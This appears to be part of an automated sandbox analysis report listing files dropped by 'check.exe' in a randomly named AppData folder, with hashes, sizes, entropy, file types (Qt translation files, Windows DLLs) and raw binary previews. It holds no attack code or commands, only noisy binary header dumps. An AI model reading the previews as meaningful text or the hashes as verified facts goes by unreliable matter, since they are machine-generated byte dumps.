                                                                                                                                                                                                            SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203767
                                                                                                                                                                                                            Entropy (8bit):5.362551648909705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                            MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                            SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                            SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                            SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):125763
                                                                                                                                                                                                            Entropy (8bit):4.80343609423322
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                            MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                            SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                            SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                            SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194487
                                                                                                                                                                                                            Entropy (8bit):4.877239354585035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                            MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                            SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                            SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                            SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):158274
                                                                                                                                                                                                            Entropy (8bit):5.402056706327934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                            MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                            SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                            SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                            SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):127849
                                                                                                                                                                                                            Entropy (8bit):5.83455389078597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                            MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                            SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                            SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                            SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2483712
                                                                                                                                                                                                            Entropy (8bit):6.241719144701645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                            MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                            SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                            SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                            SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2494976
                                                                                                                                                                                                            Entropy (8bit):6.232020603277999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                            MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                            SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                            SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                            SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5144576
                                                                                                                                                                                                            Entropy (8bit):6.262739223310643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                            MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                            SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                            SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                            SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120320
                                                                                                                                                                                                            Entropy (8bit):6.034057886020456
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                            MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                            SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                            SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                            SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49744
                                                                                                                                                                                                            Entropy (8bit):6.701724666218339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                            MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                            SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                            SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                            SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):84240
                                                                                                                                                                                                            Entropy (8bit):6.607563436050078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                            MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                            SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                            SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                            SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131344
                                                                                                                                                                                                            Entropy (8bit):6.311142284249784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                            MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                            SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                            SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                            SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):277776
                                                                                                                                                                                                            Entropy (8bit):6.5855511991551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                            MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                            SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                            SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                            SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                            Entropy (8bit):6.220967684620152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                            MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                            SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                            SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                            SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157968
                                                                                                                                                                                                            Entropy (8bit):6.854644275249963
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                            MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                            SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                            SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                            SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
